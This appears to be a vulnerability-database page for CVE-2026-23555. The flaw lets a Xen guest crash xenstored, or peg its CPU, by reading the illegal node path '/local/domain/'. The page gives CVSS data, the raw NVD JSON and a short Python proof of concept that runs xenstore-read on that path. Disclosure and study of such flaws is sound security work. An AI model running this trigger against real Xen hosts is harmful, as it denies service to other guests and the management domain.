Security Vulnerability Report
CVE-2026-23555 CVSS 7.1 HIGH

CVE-2026-23555

Published: 2026-03-23 07:16:07
Last Modified: 2026-04-10 20:38:17

Description

Any guest that issues a Xenstore command accessing a node via the (illegal) node path "/local/domain/" will crash xenstored, because an error indicator is clobbered in xenstored while it verifies the node path.

Note that the crash is forced by a failing assert() statement in xenstored. If xenstored is built with NDEBUG #defined, an unprivileged guest that tries to access the node path "/local/domain/" will no longer be serviced by xenstored. Other guests (including dom0) will still be serviced, but xenstored will use up all the CPU time it can get.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:xen:xen:*:*:*:*:*:*:x86:* - VULNERABLE
Xen (for the specific affected versions, refer to XSA-481)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-23555
# This script attempts to crash xenstored by accessing the illegal path.
import subprocess
import sys

# Simulate sending a xenstore command to the illegal path
# In a real scenario, this would use the xenstore library or direct socket communication
# Command: xenstore-read /local/domain/
def trigger_vulnerability():
    try:
        print("Attempting to access illegal path: /local/domain/")
        # This command attempts to read the restricted path
        result = subprocess.run(['xenstore-read', '/local/domain/'], capture_output=True, text=True)
        print("Command executed. Check xenstored status for crash or high CPU usage.")
        print("Stdout:", result.stdout)
        print("Stderr:", result.stderr)
    except FileNotFoundError:
        print("Error: 'xenstore-read' command not found. This PoC requires Xen tools installed.")
    except Exception as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    trigger_vulnerability()

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23555", "sourceIdentifier": "[email protected]", "published": "2026-03-23T07:16:07.330", "lastModified": "2026-04-10T20:38:17.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Any guest issuing a Xenstore command accessing a node using the\n(illegal) node path \"/local/domain/\", will crash xenstored due to a\nclobbered error indicator in xenstored when verifying the node path.\n\nNote that the crash is forced via a failing assert() statement in\nxenstored. In case xenstored is being built with NDEBUG #defined,\nan unprivileged guest trying to access the node path \"/local/domain/\"\nwill result in it no longer being serviced by xenstored, other guests\n(including dom0) will still be serviced, but xenstored will use up\nall cpu time it can get."}, {"lang": "es", "value": "Cualquier invitado que emita un comando de Xenstore accediendo a un nodo utilizando la ruta de nodo (ilegal) '/local/domain/', provocará la caída de xenstored debido a un indicador de error sobrescrito en xenstored al verificar la ruta del nodo.\n\nTenga en cuenta que la caída es forzada mediante una instrucción assert() fallida en xenstored. En caso de que xenstored se compile con NDEBUG #definido, un invitado sin privilegios que intente acceder a la ruta del nodo '/local/domain/' resultará en que ya no sea atendido por xenstored, otros invitados (incluido dom0) seguirán siendo atendidos, pero xenstored consumirá todo el tiempo de CPU que pueda obtener."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 4.0}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:xen:xen:*:*:*:*:*:*:x86:*", "versionStartIncluding": "4.18.0", "matchCriteriaId": "242BBD5A-0BAE-4F89-8597-7D286D6C9E25"}]}]}], "references": [{"url": "https://xenbits.xenproject.org/xsa/advisory-481.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/17/7", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}, {"url": "http://xenbits.xen.org/xsa/advisory-481.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Patch", "Vendor Advisory"]}]}}